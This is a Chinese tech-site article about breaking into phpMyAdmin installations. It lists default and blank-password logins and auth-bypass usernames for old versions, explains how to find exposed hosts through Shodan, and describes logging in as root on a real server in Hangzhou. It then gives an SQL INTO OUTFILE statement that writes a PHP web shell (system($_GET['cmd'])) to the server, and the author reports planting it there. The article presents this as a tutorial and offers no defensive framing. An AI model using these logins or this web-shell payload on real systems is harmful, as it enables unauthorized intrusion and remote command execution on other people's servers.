phpMyAdmin通过密码漏洞留后门文件
更新时间:2018年11月20日 09:51:28 作者:吃面包的科学怪人
今天小编就为大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
- 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
- 版本 2.11.3~2.11.4:用户名
'localhost'@'@"登陆,无需密码。 - 版本 2.11.9.2:用户名
root登陆,无需密码。
经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。
下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。
地址已手动打码。
http://121.***.*.219:80/
登陆成功(root 权限)。
接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"
点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对脚本之家的支持。如果你想了解更多相关内容请查看下面相关链接
相关文章
论坛的附件功能当初设计的初衷并不是为了文件管理,由于服务器配置,php,网络等多方面因素,使得通过论坛上传文件并不是一个好方案。2008-11-11
IIS下PHP连接数据库提示mysql undefined function mysql_connect()
在很多php教程初学者都会在初次php mysql时出来undefined function mysql_connect() 错误提示,下面我们来分析原因中。2010-06-06
要详细了解PHP OO最好看PHP手册。大家都知道的部分就不说了,这里只记下容易忘记的部分2011-11-11
php文件操作小结(删除指定文件/获取文件夹下的文件名/读取文件夹下图片名)
这篇文章主要介绍了php文件操作方法,包括删除指定文件、获取文件夹下的文件名及读取文件夹下图片名,涉及php针对文件与目录的常用操作技巧,需要的朋友可以参考下2016-05-05
仿AS3实现PHP 事件机制实现代码,需要的朋友可以参考下。2011-01-01
php5 non-thread-safe和thread-safe这两个版本的区别分析
从PHP5.2.10版本开始(现在有PHP5.2.10和5.3两个版本),有None-Thread Safe与Thread Safe两种版本的可供选择,这两种版本有何不同,作为使用者来说又应该如何选择呢?下面聚友将为您讲述。2010-03-03
这篇文章主要介绍了PHP将二维数组某一个字段相同的数组合并起来的方法,涉及PHP多维数组操作的相关技巧,需要的朋友可以参考下2016-02-02
通过代理类ClassOneDelegator来代替ClassOne类来实现他的方法。2008-10-10
php 随机数的产生、页面跳转、件读写、文件重命名、switch语句
刚做的一个项目中的部分代码,包含了php中随机数的产生、页面跳转、件读写、文件重命名、switch语句。2009-08-08
这篇文章主要介绍了PHP生成图片缩略图类,可实现针对图形文件的属性获取、转换、文件生成等功能,非常简便实用,需要的朋友可以参考下2017-01-01
最新评论